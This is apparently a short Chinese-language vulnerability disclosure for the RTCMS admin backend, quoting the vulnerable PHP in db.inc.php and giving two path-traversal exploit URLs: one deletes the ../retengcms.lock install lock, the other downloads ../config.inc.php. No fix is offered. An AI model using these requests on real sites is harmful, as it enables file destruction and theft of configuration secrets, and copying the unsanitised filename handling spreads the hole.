RTCMS后台任意文件读取&&删除

RTCMS

下载地址:http://down.admin5.com/php/113335.html

1.漏洞文件:rtcms\admin\db.inc.php

case ‘delete’:

if(!$name)showmsg(‘请选择要删除的备份文件!’);

foreach($name as $filename)

{

@unlink(RETENG_ROOT.’data/bakup/’.$filename);

}

showmsg(‘成功删除备份文件!’,’?file=db&action=import’);

break;

1.1后台数据库还原删除处任意文件删除::http://localhost/admin.php?file=db&action=delete&do_submit=1&name%5B%5D=../retengcms.lock&chkall2=1

case ‘down’:

$filepath=RETENG_ROOT.’data/bakup/’.$filename;

$filesize=sprintf(“%u”, filesize($filepath));

$filetype=get_fileext($filename);

if(ob_get_length() !== false) @ob_end_clean();

header(‘Pragma: public’);

header(‘Last-Modified: ‘.gmdate(‘D, d M Y H:i:s’) . ‘ GMT’);

header(‘Cache-Control: no-store, no-cache, must-revalidate’);

header(‘Cache-Control: pre-check=0, post-check=0, max-age=0’);

header(‘Content-Transfer-Encoding: binary’);

header(‘Content-Encoding: none’);

header(‘Content-type: ‘.$filetype);

header(‘Content-Disposition: attachment; filename=”‘.$filename.'”‘);

header(‘Content-length: ‘.$filesize);

readfile($filepath);

exit;

break;

1.2后台数据库备份处任意文件读取:http://localhost/admin.php?file=db&action=down&filename=../config.inc.php

0 条评论
发表一条评论